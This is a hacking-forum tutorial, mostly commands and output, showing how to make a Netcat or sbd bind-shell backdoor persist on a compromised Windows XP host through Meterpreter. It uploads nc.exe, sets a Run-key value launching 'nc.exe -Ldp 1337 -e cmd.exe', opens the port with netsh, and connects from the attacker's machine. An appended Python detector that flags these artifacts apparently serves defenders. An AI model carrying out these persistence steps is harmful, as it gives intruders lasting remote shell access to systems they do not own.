Persistent Netcat/SBD Backdoor with Metasploit 05-13-2013, 11:53 PM
Hello Sinisterly members. I will show you how to make a persistent Netcat backdoor with Metasploit, on a compromised system for example.
We make the backdoor persistent by interacting with the system firewall and the registry.
Okay, so let's start Metasploit and upload Netcat, or sbd.exe if you want a Netcat-style binary with password protection for your shell (BackTrack and Kali have it pre-installed).
I will be using Backtrack 5 in this tutorial.
Code:
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading : /tmp/nc.exe -> C:\windows\system32
[*] uploaded : /tmp/nc.exe -> C:\windows\system32nc.exe
The next step is to have Netcat listen on a port; which port does not really matter, but in this tutorial we'll be using port 1337. Then we want to get past the system firewall and have the port opened on startup.
To do this we will use the "reg enumkey" command and edit the following key:
Code:
'HKLM\software\microsoft\windows\currentversion\run'
It will look like this:
Code:
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Next we set a Run value so that netcat or sbd.exe starts on boot, listening on port 1337 for a connection, and query it back to confirm:
Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 1337 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 1337 -e cmd.exe
Now we have to configure the system to allow remote connections through the firewall to our netcat or sbd.exe backdoor. We do this from an interactive command prompt with the "netsh" command, first checking whether operational mode is enabled on the firewall.
Code:
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ > netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
As you can see here operational mode is enabled (fuck yeah). So our next step is to open port 1337 in the firewall so that we can connect to netcat or sbd.exe on it.
Code:
C:\ > netsh firewall add portopening TCP 1337 "NETCAT BACKDOOR" ENABLE ALL
netsh firewall add portopening TCP 1337 "NETCAT BACKDOOR" ENABLE ALL
Ok.
C:\ > netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
1337 TCP Enable NETCAT BACKDOOR
139 TCP Enable NetBIOS Session Service
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Now, to connect to our netcat or sbd.exe backdoor, run the following command from the attacking machine:
Code:
root@charon:~# nc -v 192.168.56.60 1337
There we go, a persistent netcat/sbd.exe backdoor!
I hope you have enjoyed the tutorial.
Thanks to DES for teaching me this.
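From the defensive side, the two artifacts this tutorial leaves on the host (a Run-key value that launches a bind shell, and a firewall exception for the same port) are exactly what to hunt for. The following Python is an added example, not part of the original post: it parses the "reg queryval" and "netsh firewall show portopening" output shown above (embedded here as constructed samples) and flags the correlation. The baseline port set, the bind-shell pattern and the port-flag regex are assumptions, not part of any Metasploit or Windows tooling.

```python
import re

# Constructed samples reproducing the tutorial's reg queryval and
# netsh firewall show portopening output, as a responder would collect them.
RUN_KEY_OUTPUT = r"""Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 1337 -e cmd.exe
"""
PORTOPENING_OUTPUT = """Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
1337 TCP Enable NETCAT BACKDOOR
139 TCP Enable NetBIOS Session Service
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
"""
# Assumed baseline: exceptions an XP-era host normally has (NetBIOS only).
BASELINE_PORTS = {("139", "TCP"), ("137", "UDP"), ("138", "UDP")}
# Assumed bind-shell signature: a listen flag (-l/-L) plus -e/-c handing out cmd.
BIND_SHELL_RE = re.compile(r"-[lL]\S*.*\s-[ec]\s+\S*cmd(\.exe)?\b", re.I)
LISTEN_PORT_RE = re.compile(r"(?:^|\s)-[A-Za-z]*p\s+(\d+)")  # e.g. "-Ldp 1337"

def run_key_listeners(text):
    """Return (name, command, port) for Run values that look like bind shells."""
    hits, name = [], None
    for line in text.splitlines():
        if line.startswith("Name:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Data:"):
            cmd = line.split(":", 1)[1].strip()
            if BIND_SHELL_RE.search(cmd):
                m = LISTEN_PORT_RE.search(cmd)
                hits.append((name, cmd, m.group(1) if m else None))
    return hits

def unexpected_openings(text):
    """Return (port, proto, name) for enabled exceptions outside the baseline."""
    found = []
    for line in text.splitlines():
        m = re.match(r"(\d+)\s+(TCP|UDP)\s+Enable\s+(.+)", line)
        if m and (m.group(1), m.group(2)) not in BASELINE_PORTS:
            found.append((m.group(1), m.group(2), m.group(3).strip()))
    return found

def correlate(run_text, fw_text):
    """Listeners whose port also got a firewall exception: a high-confidence find."""
    opened = {port for port, _, _ in unexpected_openings(fw_text)}
    return [hit for hit in run_key_listeners(run_text) if hit[2] in opened]
```

On a live host the same two inputs come from "reg query HKLM\...\Run" and "netsh firewall show portopening" (or the newer "netsh advfirewall" on Vista and later, which this parser does not cover).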